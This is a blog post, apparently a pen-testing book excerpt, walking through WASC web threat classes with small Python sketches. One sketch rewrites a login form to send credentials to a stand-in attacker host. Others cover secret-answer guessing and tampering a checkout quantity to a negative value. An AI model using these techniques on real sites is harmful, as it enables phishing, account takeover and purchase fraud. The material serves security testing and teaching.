June 26, 2011, 9:08 a.m.
posted by creed
This section covers some other areas that were not covered under OWASP’s Top Ten.
This section correlates to 1.2 of the WASC Threat Classifications.
Insufficient Authentication is a highly subjective condition. While pen testing you need to keep a sharp eye out for access to sensitive content or functionality where authentication is not required. The most overt example is unauthenticated access to administrative capabilities. This is blatantly a problem with targets that have engaged in security by obscurity for whatever reason. Referring back to what you learned about discovery in Chapter 2, the resource enumeration functions are very useful here, so analyze the exposed resources carefully and document anything that seems odd.
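To make that enumeration pass concrete, here is a minimal Python sketch of flagging administrative resources that answer without demanding credentials. The path list, classification rules, and canned status codes are illustrative assumptions standing in for live requests, not a definitive audit.

```python
# Hypothetical helper: probe common administrative paths without credentials
# and flag any that do not demand authentication.
from urllib.parse import urljoin

ADMIN_PATHS = ["/admin/", "/administrator/", "/manage/", "/console/", "/admin/login.jsp"]

def classify(status):
    """Interpret an HTTP status code from an unauthenticated probe."""
    if status in (401, 403):
        return "protected"        # server demanded credentials
    if status in (301, 302, 303, 307):
        return "redirected"       # often a bounce to a login page -- verify manually
    if status == 200:
        return "OPEN"             # served content with no authentication at all
    return "other"

def probe(base_url, statuses):
    """Map each candidate path to a verdict; `statuses` would come from real requests."""
    return {urljoin(base_url, p): classify(s) for p, s in zip(ADMIN_PATHS, statuses)}

# Example with canned status codes standing in for live responses:
print(probe("http://target.example/", [401, 302, 200, 404, 403]))
```

In a live test you would replace the canned status codes with real responses gathered via your proxy or HTTP client, and manually verify anything flagged OPEN or redirected.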
This section correlates to 1.3 of the WASC Threat Classifications.
Weak Password Recovery Validation is a problem that arises when entities try to be too user friendly. This functionality allows a user to initiate some password recovery process via the web. You must look for flaws that allow you (or an attacker) to change or recover another user's password. Report on situations where the required information is either easily guessed or easily circumvented. The three common web-based techniques used for password recovery are as follows:
Information Verification (for example, matching an e-mail address already on file)
Stored Password Hints
Secret Question and Answer
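As a hedged illustration of why easily guessed answers matter, the following Python sketch shows how few attempts an attacker needs when a recovery form relies on a common secret answer. All questions, answer lists, and the simulated endpoint are hypothetical.

```python
# Illustrative only: a tiny dictionary attack against a secret-answer check.
# `attempt` stands in for the real recovery endpoint so the logic runs locally.
COMMON_ANSWERS = {"mother's maiden name": ["smith", "jones", "johnson"],
                  "favorite color": ["blue", "red", "green", "black"],
                  "first pet": ["max", "buddy", "bella"]}

def guess_recovery(question, attempt):
    """Try a short list of statistically common answers against a recovery form."""
    for answer in COMMON_ANSWERS.get(question.lower(), []):
        if attempt(answer):
            return answer
    return None

# Simulated endpoint for demonstration: the victim chose a very common answer.
simulated = lambda answer: answer == "blue"
print(guess_recovery("Favorite color", simulated))   # a hit means the control is weak
```

If a handful of guesses like these succeeds, or if the form never locks out after repeated failures, report the recovery mechanism as weak.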
This section correlates to 3.1 of the WASC Threat Classifications.
Although this is not directly related to pen testing, what you can do is gauge whether or not your target is highly susceptible to Content Spoofing. Content Spoofing attacks trick end users into believing that content appearing on a bogus site is legitimate. Phishing attacks, which most people are aware of these days, are the obvious example: specially crafted content is presented to a user, and if the user visits the malicious target, she will believe she is viewing authentic content from the legitimate location when in fact she is not.
One example you can use to educate your target is to simulate bogus login pages that end users will think are legitimate. This is an area that requires creativity, and though some targets are not interested in it, they need to know how easy or difficult it is for their content to be spoofed.
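To illustrate how little effort spoofing takes, here is a hypothetical Python sketch that clones the look of a login form and redirects its submission target to an attacker-controlled host. Every URL and field name here is invented for the example.

```python
# Demonstration of content spoofing mechanics: a visually identical form
# whose action has been rewritten to harvest credentials elsewhere.
LEGIT_FORM = ('<form action="https://bank.example/login" method="post">'
              '<input name="uid"><input name="pwd" type="password"></form>')

def spoof(form_html, harvest_url):
    """Rewrite the form's action so submitted credentials go to the attacker."""
    return form_html.replace('action="https://bank.example/login"',
                             f'action="{harvest_url}"')

bogus = spoof(LEGIT_FORM, "http://evil.example/harvest")
print(bogus)  # renders identically to the user; credentials go elsewhere
```

A one-line rewrite is all that separates the legitimate page from the bogus one, which is precisely the point worth demonstrating to a skeptical target.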
This section correlates to 5.2 of the WASC Threat Classifications.
Information leakage can show itself in many different forms. You have seen numerous areas of potential leakage take shape during the Discovery phase in Chapter 3. But once you are actually hitting your target directly, more information may be leaked. So bear these points in mind when you are actually performing the Attack Simulations throughout the rest of the book:
Once you have local copies of the target web pages you may find useful information in hidden field variables of the HTML forms or comments in the HTML.
The following are excellent potential sources of leaked information:
Welcome and Farewell messages
Debug and error messages
Technical manuals (once you have identified the target environment)
User forums related to the target application
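Once you have a local mirror of the target, a quick script can surface the hidden fields and HTML comments mentioned above. This is a rough Python sketch using regular expressions; a real audit would favor a proper HTML parser.

```python
# Scan locally saved pages (e.g. an HTTrack mirror) for two common
# leakage points: hidden form fields and developer comments.
import re

HIDDEN = re.compile(r'<input[^>]*type=["\']hidden["\'][^>]*>', re.I)
COMMENT = re.compile(r'<!--(.*?)-->', re.S)

def leaks(html):
    """Return hidden inputs and comment bodies found in one page's HTML."""
    return {"hidden_fields": HIDDEN.findall(html),
            "comments": [c.strip() for c in COMMENT.findall(html)]}

page = ('<!-- TODO: remove debug backdoor before launch -->'
        '<form><input type="hidden" name="price" value="19.99"></form>')
print(leaks(page))
```

Run it across every file in the mirror and document anything odd, such as prices or role flags stored client-side, or comments referencing internal hosts and credentials.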
This section correlates to 6.1 of the WASC Threat Classifications.
Abuse of Functionality is an attack technique where legitimate functionality is twisted into malicious functionality. For example, envision a bulletin board Web application that builds pages dynamically from data in a DB. If an attacker injects some crafted code into the DB, she will get data fed to her every time that page is loaded and the DB is queried. Hence she has abused legitimate functionality.
The manual manipulation of data sent to the server or application can yield interesting results. It requires special knowledge and possibly the use of specific tools but it will probably give you the deepest understanding of your target. One tactic is to save web pages locally. You can do this individually, or use HTTrack as discussed earlier. Saving pages locally and determining which segment of code to alter can be a tedious effort and may require knowledge of scripting languages, but this is essential so take a look at a basic example here.
It is important to note that the use of a Proxy server can save you hours of work and is the preferred method of this type of audit. A good Proxy server grants you tremendous power and in particular it allows you to trap raw HTTP requests. The requests can be stalled before they actually get sent to the server. Then the pen tester can analyze, edit, and finally submit them. For instance, assume you are testing the quantity field of an e-commerce application. The purchase amount would most likely be displayed in a drop-down list box. For this example assume the allowed quantities range from 1 to 5. Using a Proxy server, a raw legitimate client-side HTTP transaction could potentially look like this:
POST /cart_checkout.jsp HTTP/1.1
...
Cookie: rememberUID=; rememberUPW=; JSESSIONID=BKPn89L10wVYYgpSZF4TLrgrz3SsywFdGTyXbjT2GH
Authorization: Basic QW5kcmVzOlllYWggaXQncyBtZQ==

mode=purchase&product=123456&desc=pc&quantity=1& ...
For the purpose of testing server-side validation, you can alter this type of data before it is sent to the server. Using a Proxy you can stall transactions and, for instance, modify the quantity field to determine whether negative quantities are accepted. Depending on the Business Logic Tier this may even provide you with a credit! So play around; in this example you could potentially modify the quantity value by adding a negative sign as such:

mode=purchase&product=123456&desc=pc&quantity=-1& ...
This same tactic will allow you to test the quantity boundaries in either direction; for example, you could also send an out-of-range value well above the drop-down maximum of 5 and see how the app responds.
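If you want to automate the boundary probes rather than editing each request by hand in the proxy, a short script can generate the tampered bodies for replay. This Python sketch assumes the hypothetical checkout parameters from the example above; the probe values are illustrative.

```python
# Generate one tampered POST body per probe value. In practice each body
# would be replayed through a proxy or an HTTP client and the server's
# responses compared against the legitimate quantity=1 baseline.
from urllib.parse import urlencode

BASE = {"mode": "purchase", "product": "123456", "desc": "pc"}
PROBES = ["-1", "0", "6", "99999", "1.5", "abc"]   # all outside the 1-5 drop-down range

def tampered_bodies():
    """Build a POST body for each boundary-breaking quantity value."""
    return [urlencode({**BASE, "quantity": q}) for q in PROBES]

for body in tampered_bodies():
    print(body)   # e.g. mode=purchase&product=123456&desc=pc&quantity=-1
```

Any probe the server accepts without a validation error, especially the negative and non-numeric ones, points to missing server-side validation worth reporting.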
This section correlates to 6.3 of the WASC Threat Classifications.
Insufficient Anti-automation exists when a web site allows so much automation that any notion of checks and balances is nullified. In scenarios like this, a breach can go undetected for long periods of time and the extent of the damage is virtually impossible to determine. Look for these types of automated processes in your manual analysis and use your judgment to determine whether any risk is at hand.
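One way to gauge this during testing is to measure how many rapid, identical submissions the application tolerates before it throttles, blocks, or demands a CAPTCHA. The following Python sketch simulates the idea locally; in practice you would swap the injected submit function for a real HTTP call.

```python
# Rough gauge of anti-automation controls: fire many identical submissions
# and count how long the application accepts them.
def automation_tolerance(submit, attempts=50):
    """Count consecutive accepted submissions before the first rejection."""
    for i in range(attempts):
        if not submit(i):
            return i          # throttled after i accepted submissions
    return attempts           # never throttled: a sign of insufficient anti-automation

# Simulated server that starts rejecting after 10 rapid requests:
print(automation_tolerance(lambda i: i < 10))   # -> 10
# Simulated server that never throttles:
print(automation_tolerance(lambda i: True))     # -> 50, a red flag
```

An application that never pushes back against this kind of loop is a strong candidate for an Insufficient Anti-automation finding.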
This section correlates to 6.4 of the WASC Threat Classifications.
Insufficient Process Validation occurs when a Web app inadvertently permits the bypassing of built-in flow controls. For example, envision a site that takes a user through a series of steps toward registration, building up a stateful data set along the way that is ultimately ingested into the DB. If this registration, or worse yet some related approval process, can be bypassed, then the process has flaws that you would need to identify. One of the critical areas to reference for these types of probes is the session section.
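A simple probe for this class of flaw is to request the final step of a flow cold, without the session state the earlier steps should have established. This Python sketch captures the idea; the step URLs and responder functions are hypothetical stand-ins for real requests.

```python
# Probe a multi-step flow for Insufficient Process Validation by jumping
# straight to the last step with no accumulated session state.
STEPS = ["/register/step1", "/register/step2", "/register/confirm"]

def check_flow(responder):
    """Hit the last step cold; a 200 with no prior state means the flow is bypassable."""
    status = responder(STEPS[-1], session_state=None)
    return "BYPASSABLE" if status == 200 else "enforced"

# A well-behaved app bounces stateless visitors back to the start (302):
print(check_flow(lambda url, session_state: 302))   # -> enforced
# A flawed app happily serves the confirmation page:
print(check_flow(lambda url, session_state: 200))   # -> BYPASSABLE
```

Repeat the probe at each intermediate step; any step reachable without its predecessors is a flow-control flaw to document.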
If you are dealing with any compiled code, you may need to investigate it on a non-functional level. What you will look for is whether or not the binary files can be deconstructed. You should also try to clearly identify the communication protocols used for data transmission between the server and client; in a sense that is a mild form of decompilation. If you are up against compiled code that was, for instance, written in C/C++, then success in this arena will most likely be limited. If, on the other hand, you are up against Java code, you have some options if you can get your hands on the .class files and the developers did not use effective variable obfuscation during the bytecode compilation process.
Another form of reverse engineering is to deconstruct logic from the error/debug messages in application outputs and behavior patterns. This can lead to a deep understanding of how the target application operates. You can simply force errors via a browser, or in code, and analyze the behavioral patterns of the target application. There is no formula or technique that can really teach this. The best course of learning is to set up a lab environment and then approach, as an outsider, applications that you know. This way you can start learning how to identify behavior based on your knowledge.
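As a starting point for that lab work, here is a hedged Python sketch that buckets forced error output by tell-tale implementation strings. The signature lists and sample output are illustrative, not exhaustive; real fingerprinting grows out of the patterns you observe in your own lab.

```python
# Classify forced error output by implementation-revealing strings
# (stack traces, database driver names, framework banners).
SIGNATURES = {"java": ["NullPointerException", "javax.servlet"],
              "sql": ["ODBC", "SQLException", "syntax error"],
              ".net": ["System.Web", "Stack Trace:"]}

def fingerprint(body):
    """Return the technologies whose tell-tale strings appear in an error body."""
    hits = [tech for tech, patterns in SIGNATURES.items()
            if any(p in body for p in patterns)]
    return hits or ["unknown"]

sample = "500 Internal Error: java.lang.NullPointerException at com.shop.Cart"
print(fingerprint(sample))   # -> ['java']
```

Feed it the bodies of every error you can force via the browser or in code; each distinct signature narrows down the target environment and, over time, teaches you the behavioral patterns the text describes.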